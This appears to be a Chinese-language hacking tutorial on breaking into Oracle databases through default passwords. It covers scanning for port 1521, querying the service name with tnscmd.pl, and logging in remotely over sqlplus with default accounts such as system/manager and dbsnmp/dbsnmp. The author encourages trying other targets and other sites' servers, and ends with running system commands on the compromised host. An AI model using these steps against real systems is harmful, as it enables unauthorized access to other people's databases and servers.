oracle弱口令攻击

0x00 oracle数据库简介

oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点：

一、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到>几百千兆，可充分利用硬件设备。支持大量用户同时在

同一数据上执行各种数据应用，并使数据争用最小，保证数据一致性。系统维护具有高>的性能，Oracle每天可连续24小时工作，正常的系统操作

(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性，可在数据库级或在子数据库级上控制。

二、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以>它是一个开放系统，保护了用户的投资。美国标准化和技术

研究所(NIST)对Oracle7 SERVER进行检验，100%地与ANSI/ISO SQL89标准的二级相>兼容。

三、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全>性。Oracle实施数据完整性，为可接受的数据指定标准。

四、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络，允许将处理分为数据库服务器和客户应用程序，所有共享的数据管理由数据库管理系统的计算机处理，而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境，Oracle将存放在多台计算机上的数据组合成一个逻辑数据库，可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运行，以致Oracle上所开发的应用可移植到任何操作系统，只需很少修改或不需修改。Oracle软件同工业标准相兼容，包括很多工业标准的操作系统，所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。

虽然Oracle数据库具有很高的安全性，但是如果我们在配置的时候不注意安全意识，那么也是很危险的。也就是说，安全最主要的还是要靠人自己，而不能过分依赖软件来实现。

我们知道，在 mssql中，安装完成后默认有个sa的登陆密码为空，如果不更改就会产生安全漏洞。那么 oracle呢?也有的。

为了安装和调试的方便，Oracle数据库中的两个具有 DBA权限的用户 Sys和 System的缺省密码是 manager。

笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码，其中也包括很多大型的电子商务网站，我们就可以利用

进行测试前我们先来了解一些相关的知识，我们连接一个 Oracle数据库的时候，需要知道它的 service_name或者是 Sid值，就象 mssql一样，需要知道数据库名。那如何去知道呢，猜?呵呵，显然是不行的。这里我们先讲讲 oracle的 TNS listener，它位于数据库 Client和数据库 Server之间，默认监听1521端口，这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话，oracle将不会返回它的banner，如果你输入一些东西的话，它甚至有可能把你踢出去。这里我们就需要用 tnscmd.pl这个 perl程序了，它可以查询远程oracle数据库是否开启(也就是ping了)，查询版本，以及查询它的服务

名，服务状态和数据库服务名，而且正确率很高。

0x01 oracle弱口令攻击

理论方面的讲完了，如果还有什么不懂的可以去查找相关资料。现在开始测试吧，需要的工具有： ActivePerl， Oracle客户端， Superscan或者是 其它扫描端口的软件， Tnscmd.pl。

我们先用 Superscan扫描开放了端口1521的主机，假设其IP是 xx.xx.110.110，这样目标已经有了。然后我们要做的就是用Tnscmd.pl 来查询远程数据库的服务名了，Tnscmd.pl的用法如下：

C:perlbin>perl tnscmd.pl
usage: tnscmd.pl [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use ()
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)

我们下面用的只有简单的几个命令，其他的命令也很好用，一起去发掘吧。

然后我们就这样来：

C:perlbin>perl tnscmd.pl services -h xx.xx. –indent
sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.
writing  bytes
reading
._................?. ..........
DESCRIPTION=
TMP=
VSNNUM=
ERR=
SERVICES_EXIST=
.Q........
SERVICE=
SERVICE_NAME=ORCL
INSTANCE=
INSTANCE_NAME=ORCL
NUM=
INSTANCE_CLASS=ORACLE
HANDLER=
HANDLER_DISPLAY=DEDICATED SERVER
STA=ready
HANDLER_INFO=LOCAL SERVER
HANDLER_MAXLOAD=
HANDLER_LOAD=
ESTABLISHED=
REFUSED=
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
HANDLER_NAME=DEDICATED
ADDRESS=
PROTOCOL=beq
PROGRAM=/home/oracle/bin/oracle
ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
ARGV0=oracleORCL
ARGS='
LOCAL=NO
'
.........@

从上面得到的信息我们可以看出数据库的服务名为ORCL，然后我们就可以通过 sqlplus工具来远程连上它了，

用户名和密码我们用默认的 system/manager或者是 sys/manager，其他的如 mdsys/mdsys， ctxsys/ctxsys等，

这个默认用户和密码是随版本的不同而改变的。如下：

C:oracleora90BIN>sqlplus /nolog
SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
(c) Copyright 2001 oracle Corporation.　All rights reserved.
SQL>connect system/manager@
(description=(address_list=(address=(protocol=tcp)
(host=xx.xx.110.110)(port=1521)))
(connect_data=(SERVICE_NAME=ORCL)));

如果密码正确，那么就会提示 connected，如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用 dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了，那我们只能换别的目标了。但是我发现很多都是不改的，这个就是安全意识的问题了。

0x02 上面提到的两个小软件：

tnscmd.pl

代码： tnscmd.pl

用链表实现的oracle密码暴破程序

代码：用链表实现的oracle密码暴破程序

0x03 利用弱口令进行入侵:

#

C:\>sqlplus /nolog
SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)
(port=)))(connect_data=(SERVICE_NAME=ora9i)));

然后利用 OracleExecuteCommandSqlScript来执行系统命令